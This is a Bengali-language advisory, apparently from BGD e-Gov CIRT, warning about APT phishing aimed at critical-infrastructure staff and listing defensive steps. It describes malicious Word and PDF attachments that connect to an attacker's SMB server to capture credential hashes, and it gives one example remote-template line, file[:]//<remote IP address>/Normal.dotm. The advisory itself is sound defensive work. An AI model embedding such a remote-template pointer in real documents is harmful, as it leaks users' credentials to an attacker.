সতর্কতামুলক বার্তা : Advanced Persistent Threat (APT) ও Critical Infrastructure সমূহ

সতর্কতামুলক বার্তা : Advanced Persistent Threat (APT)  ও Critical Infrastructure সমূহ

বর্তমানে সাইবার জগতের আলোচিত বিষয় হচ্ছে Advanced Persistent Threat (APT) এবং APT সাইবার হুমকির অন্যতম লক্ষ্যবস্তু হচ্ছে গুরুত্বপূর্ণ সরকারী স্থাপনা বা Critical Infrastructure সমূহ।

সাইবার আক্রমণকারীরা প্রতিনিয়ত তাদের কর্মপন্থা পরিবর্তন করে যাচ্ছে যাতে তাদের কার্যকলাপ সনাক্ত করা না যায়। APT-এর উপর পরিচালিত এক গবেষণা থেকে জানা যায়, সাইবার আক্রমণকারীরা বৈধ (legitimate) ও আপাত দৃষ্টিতে সাধারন ই-মেইল এর মাধ্যমে Malware বিতরণ (distribution) করবার চেষ্টা করছে।

Figure : Advanced Persistent Threat Life Cycle (source: wikipedia)

সাধারণত সাইবার আক্রমণকারীরা ফিশিং ইমেইলগুলিতে সংযুক্তি হিসাবে প্রেরিত ওয়ার্ড অথবা পিডিএফ ডকুমেন্ট এ ক্ষতিকারক স্ক্রিপ্ট বা ম্যাক্রো দিয়ে থাকে, যার দ্বারা ক্ষতিকারক কোড বা অ্যাপ্লিকেশান, কম্পিউটার ব্যবহারকারীর অজান্তে চালু হয়ে যায় এবং কম্পিউটারটি সাইবার আক্রমণকারীর নিয়ন্ত্রণে চলে আসে। এই ক্ষেত্রে ফিশিং ইমেইলগুলিতে সংযুক্তি হিসাবে প্রেরিত ডকুমেন্টটি আক্রমণকারীর রিমোট সার্ভার এর সাথে SMB সংযুক্ত করবার চেষ্টা করে (উদাহরণ হিসেবে কমান্ড অনেকটা এই রকম file[:]//<remote IP address>/Normal.dotm ) । এই SMB সংযোগ স্থাপন করবার সময় কম্পিউটার ব্যবহারকারীর অজান্তে credential hash প্রেরন করে, যা আক্রমণকারীর রিমোট সার্ভারে সংরক্ষিত থাকে। সম্ভবত  আক্রমণকারীরা Hash value থেকে প্লেইন-টেক্সট পাসওয়ার্ডটি পাওয়ার জন্য  পাসওয়ার্ড-ক্র্যাকিং কৌশল ব্যবহার করে।  বর্তমানে  Critical Infrastructure ও manufacturing industries তে  কর্মরত ব্যক্তিবর্গ এই APT আক্রমন এর অন্যতম  লক্ষ্য হিসেবে বিবেচিত হচ্ছেন।

টার্গেট নেটওয়ার্কে আক্রমন করবার লক্ষ্যে, আক্রমণকারীরা ফিশিং ইমেইল প্রচারাভিযান ব্যবহার (phishing email campaign) ও সামাজিক প্রকৌশল কৌশল প্রয়োগ (social engineering techniques) করে এবং কম্পিউটার ব্যবহারকারীকে তাদের প্রেরিত ফিশিং ইমেইল এ ডকুমেন্ট  ফাইল  ওপেন অথবা লিংক এ ক্লিক করতে প্ররোচিত করে।  অনেক সময় ফিশিং ইমেইল এ সংযুক্তি হিসাবে “AGREEMENT & Confidential”/ document.pdf/ resumés/CVs/report ইত্যাদি নামে থাকতে পারে যা থেকে মনে হতে পারে সংযুক্তি হিসাবে প্রেরিত  ডকুমেন্টটি Critical Infrastructure সংশ্লিষ্ট এবং  যাতে করে কম্পিউটার ব্যবহারকারীগণ ফাইল ওপেন অথবা লিংক এ ক্লিক করতে উদ্বুদ্ধ হন।

ফাইল ওপেন অথবা লিংক এ ক্লিক করলে, কম্পিউটার ব্যবহারকারী SMB প্রটোকল দ্বারা আক্রমণকারীর command & control(CNC) সার্ভার এর সাথে যুক্ত হন এবং অনেক ক্ষেত্রে একটি গ্রাফিকাল ইউজার ইন্টারফেস (GUI)  প্রদর্শন করে, যাতে Username & Password অপশন থাকে, যার দ্বারা আক্রমণকারীরা credential hash/ প্লেইন-টেক্সট পাসওয়ার্ড সংগ্রহ করে।

সতর্কতামূলক পদক্ষেপ

১) সর্বদা অযাচিত বা সন্দেহজনক ঠিকানা হতে আগত ই মেইল  অথবা সামান্য  সন্দেহ হলেও  সেগুলির ভিতরে থাকা লিঙ্কগুলিতে ক্লিক অথবা ডকুমেন্ট ওপেন করা থেকে বিরত থাকা উচিত।

২) আপনার সিস্টেমে প্রতিষ্ঠিত (renowned ) এবং পরিক্ষীত অ্যান্টি-ভাইরাস ব্যবহার করুন ও সবসময় অ্যান্টি-ভাইরাস হালনাগাদ রাখুন।

৩) SMB/Share Service নির্দিষ্ট নেটওয়ার্ক এর ভিতর সীমাবদ্ধ রাখুন ও এক্সটারনাল  SMB connection বন্ধ করুন। এই বিষয়ে সাইবার ও নেটওয়ার্ক বিশেষজ্ঞের পরামর্শ নিতে পারেন।

৪) নেটওয়ার্কর অস্বাভাবিক কার্যকলাপ (abnormal activity) মনিটর করুন (off-hour logins, unauthorized IP address logins, and multiple concurrent logins)।

৫) নেটওয়ার্কে ওয়েব এবং ইমেইল ফিল্টার স্থাপন করুন। Ingress and Egress পয়েন্ট লগিং এবং দৃশ্যমানতা(logging and visibility)  নিশ্চিত করুন। প্রতিষ্ঠান অথবা অনুমোদিত নেটওয়ার্ক ছাড়া  অন্য কোথাও হতে RDP বা অন্য কোন Log-In Method ব্লক করুন।

৬) Privileged accounts কার্যক্রমগুলি লগিং এবং অডিটিং এনাবল করুন ও নিয়মিত  মনিটর করুন।

৭) নেটওয়ার্ক এবং সিস্টেম ডকুমেন্টেশন তৈরি করুন ও সবসময়  হালনাগাদ করুন।  এই ডকুমেন্টেশন এর আওতায় নেটওয়ার্ক ডায়াগ্রাম, asset owners, type of asset , incident response plan যুক্ত করুন।

Reference URL :

 


দেবাশীষ পাল,

ইনফরমেশন সিকিউরিটি স্পেশালিষ্ট,

বিজিডি ই-গভ সার্ট

Share